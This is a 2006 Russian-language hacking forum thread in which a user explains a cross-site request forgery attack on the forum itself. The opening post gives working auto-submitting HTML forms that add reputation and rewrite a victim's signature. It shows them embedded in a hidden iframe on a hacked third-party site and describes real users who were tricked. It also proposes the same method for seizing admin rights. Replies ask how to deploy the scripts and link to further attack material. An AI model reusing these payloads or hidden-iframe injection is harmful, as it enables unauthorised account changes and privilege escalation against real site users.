ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

"Приколы" в форумах и не только... =)
  #1  
Старый 21.08.2006, 14:18
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию "Приколы" в форумах и не только... =)

Втупление
Понедельник - утро... Закончился рабочий день, и я бежал скорей домой, но не лечь в кроватку а зайти в сеть и испробовать способ выполнять команд(?) от другого пользователя на форумах... Способ на столько просто, что я даже не поверил, что он заработает =)

Итак пришел домой, просмотрев фильм "Титаник" два раза и поцеловав Лео Ди через экран сел за компутер... Вообщемто, как мы сможем "заставить" пользователя делать, то, что нам угодно... Я выбрал Добавление мне репутации и Изменение подписи пользователей...

1. Добавление репутации:
Для начала посмотрим форму добавлении репутации, для этого нажимаем на + какому нить пользователю и смотрим сорцы, разобрав мусор, мы выделим и подправим то, что нам нада, а именно:
Цитата:
<form action="http://forum.antichat.ru/reputation.php" method="post">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Не помню, чтобы тебе репу ставил... Как это вышло?! >(" /> Это наш комент (вернее уже не наш)... =)
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="183440" /> А это уже НАШЕ сообщение (т.е. на которое придет репутация)..
А какже мы заставим пользователя нажать на submit? А зачем его заставлять? Добавим id в форму и добавим событие, при котором после загрузки страницы submit "нажимаеться сам"...

Вот полный "скрипт":
Цитата:
<body onload="p.submit()">
<form action="http://forum.antichat.ru/reputation.php" method="post" id="p">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Не помню, чтобы тебе репу ставил... Как это вышло?! >(">
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="183440"/>
Так, тут всё ясно... Теперь осталось тока заставить пользователя(лей) зайти на эту страницу... У меня есть один хакнутый левый сайт... Я изменил главную страницу добавив в неё:

Цитата:
<iframe src=page.htm width=0 height=0 border=0>
Соответсвенно page.htm содержит код приведенный выше...
и еще добавил алерт с преведами, типа за этим я их и послал сюда =)...
Сидел я вмирке туда я и запостил url... Мол типа прведы вам... =) А на самом деле преведы мне... Вернее превед ("Попался тока ArdeOS =)" Он отказался удалять добавленную им репу, сославшись на респект =) Ну я не против... За это ему тоже отдельный респект...

С этим разобрались? Разобрались...

2. "Приколы".

Ну как можно "поприкалываться"... Варианты есть... Вообщемто почти все, еслибы мы были "жертвой"... Ну например добавление сообщений, ПМ, Создание темы, изменить личное инфо (кроме пароля), подпись... Я остановился на последнем... Идем с начала...
Заходим на страницу изменении подписи->Смотрим сорцы-Ювыдираем и чистим то, что нужно нам...
Покажу сразу рабочий код =)
Цитата:
<body onload="p.submit()">
<form action="http://forum.antichat.ru/profile.php" method="post" id="p">
<input type="hidden" name="message" value="Owned by Jesus (извините миня...) =)"> Как не сложно догодаться это и есть новая подпись =)
<input type="hidden" name="s" value="" />
<input type="hidden" name="do" value="updatesignature" />
</form>
На этот раз попалась Fishka_Shtuchka... Теперь у неё на подписи красуться заветный текст =) ...

ЗЫ: Я ИЗВИНИЛСЯ И ИЗВИНЯЮСЬ =)

3. А теперь о серьезном...
Этот спопсоб можно применить для того, чтобы зделать себя админом...
"Теоретим": Например Админ зашел в Админку и у него сохранилась сессия, значит при следующем входе в админку форум пароль просить не будет, значит можно попробовать... Абсолютно все также! Заходим->Cмотрим сорцы->чистим и редактируем->Думаем как послать это админу->Админим =)

Защититься от этого? Ну даже не знаю... Для форума, я бы предложил зделать проверку по рефералу. Чтоб с левый url скрипты не выполнялись...
Скажет Вася Пупкин: "Но ведь есть способы подделать referer!"... Конечно можно, но тогда нам в покете отправлять cookie... А если они у нас есть, зачем все выше сказанное? =)

Для пользователей... Пользуйтесь другим браузером, котгда гуляете по "левым" ссылкам =)

Еще раз извиняюсь =)
 
Ответить с цитированием

  #2  
Старый 21.08.2006, 15:51
Аватар для Mukis
Mukis
Участник форума
Регистрация: 27.11.2005
Сообщений: 211
Провел на форуме:
619677

Репутация: 34
По умолчанию

Просто не надо ходить по левым ссылкам.
 
Ответить с цитированием

  #3  
Старый 21.08.2006, 16:50
Аватар для Inferno
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

Да довольно интересно,только после этого репу можно удалить..
 
Ответить с цитированием

  #4  
Старый 21.08.2006, 22:20
Аватар для TERYS
TERYS
Участник форума
Регистрация: 11.01.2006
Сообщений: 128
Провел на форуме:
612424

Репутация: 55
По умолчанию

А для тугих можно обьяснить куда это скрипты девать? просто создать сайт в нете и в код странички вписать скрипты? и еще, они только на этом форуме пашут?
 
Ответить с цитированием

  #5  
Старый 21.08.2006, 22:22
Аватар для Baron Night
Baron Night
Познающий
Регистрация: 06.08.2006
Сообщений: 68
Провел на форуме:
430286

Репутация: 50
По умолчанию

Цитата:
Сообщение от TERYS  
А для тугих можно обьяснить куда это скрипты девать? просто создать сайт в нете и в код странички вписать скрипты? и еще, они только на этом форуме пашут?
зайди на _http://ms-dosant.narod.ru/teror.html

там все написано
 
Ответить с цитированием

  #6  
Старый 21.08.2006, 22:38
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

Нифига все нормально, он дыру нашел
 
Ответить с цитированием

  #7  
Старый 22.08.2006, 01:16
Аватар для hidden
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию

Блин, я это не пробовал, только потому что был уверен что referer проверяется.

Кстати репу тебе исправил с 66 на 69
 
Ответить с цитированием

  #8  
Старый 22.08.2006, 04:59
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Спасибки всем...
Fishka_Shtuchka извини... А подпись тупая придумалась... Сам не знаю, как мне такое в голову пришло =)
 
Ответить с цитированием

  #9  
Старый 22.08.2006, 11:44
Аватар для Fishka-shtuchka
Fishka-shtuchka
Познающий
Регистрация: 19.08.2005
Сообщений: 31
Провел на форуме:
456732

Репутация: 55
Отправить сообщение для Fishka-shtuchka с помощью ICQ
По умолчанию

bul.666 да ладно
 
Ответить с цитированием

  #10  
Старый 23.08.2006, 16:49
Аватар для Videomann
Videomann
Новичок
Регистрация: 29.06.2006
Сообщений: 12
Провел на форуме:
8910

Репутация: 0
По умолчанию

Чё то не пашет! Короче на форуме выложил ссылку типа mysite.ru/script.html
и пробовал перейти по ней и мне выдоло вот это
Цитата:
In order to accept POST request originating from this domain, the admin must add this domain to the whitelist.
В чём трабла ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
БРЕДОГЕНЕРАТОР ДЛЯ ФЛУДА S0d Чаты 13 07.02.2006 20:31
SQL-injection и не только, через cookies k00p3r Чужие Статьи 0 12.06.2005 12:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ